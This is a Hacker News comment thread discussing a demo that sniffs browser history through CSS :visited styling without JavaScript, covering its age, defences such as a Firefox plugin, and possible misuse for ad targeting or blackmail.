
Sniffing Browser History with No Javascript - vaksel
http://www.making-the-web.com/misc/sites-you-visit/nojs/
======
sdt
You can protect yourself against this by disabling a:visited. Here's a Firefox
plugin that does it intelligently, without breaking the functionality on sites
where you actually clicked a link.

<http://safehistory.com/>

------
tptacek
This shouldn't be news, since nothing about the original flaw --- which is
_years_ old --- involved Javascript.

~~~
axod
Also, this exact method (css background) was mentioned last time the js
version came up on hacker news. How many more times will this be posted?

~~~
Tichy
I seem to have missed all the previous times it was posted :-(

I am surprised that the browser try to be smart about loading images defined
in the CSS.

------
paraschopra
Great but I would be really interested if someone could demonstrate an
application deriving some real world use out of these information. Seen many
demos of this browser sniffing but is any one using it for real?

~~~
vaksel
it could be useful in targeting ads, i.e. tracking users other website habits
to show them much more relevant ads.

Let's say HN has ads. And it sees that you just came from a Python tutorial
site. Instead of showing you a random programming book, the ad would show you
a series of Python books.

~~~
tptacek
Let's say you're a staffer for a Republican congressman, and I'm an innocuous
web page you've visited. Oh, look! You've visited a lot of gay pornography
sites! I think I'd like you to start paying me $50 a month now, so I can
"protect" you from negative publicity.

~~~
johnnybgoode
Because a Democratic congressman wouldn't have any political problems
whatsoever if found to have visited gay porn sites. :)

~~~
tptacek
I didn't give much thought to this example but I think it makes the point OK.

------
jrockway
If you're upset about this, wait until you hear about Google Analytics...

------
jorgem
It'd be nice if NOSCRIPT could have an option like: "Don't share my browser
history with this site". If that option were on, the page just wouldn't have
any 'visited' links at all. I could live with that.

~~~
Sephr
There already is a Firefox plugin for that (<http://safehistory.com/>).
NoScript, unsurprisingly, is only for _JavaScript_.

------
Sephr
This inspired me to take the concept even further:
<http://news.ycombinator.com/item?id=655101>

This will only work in Opera and Gecko-based browsers.

------
Pistos2
Isn't the utility of the technique watered down by the fact that the attacker
has to precompile a list of addresses? Anything not in that list won't be
mined.

~~~
tptacek
Great, so now there's recurring revenue in it for the business that sells
subscriptions to targeted lists.

------
knowtheory
So... this browser thing, actually -is- gathering analytics from anyone who
visits it. :P

------
radu_floricica
Apparently it crashes Chrome.

~~~
username
No crash on Chrome 2 here.

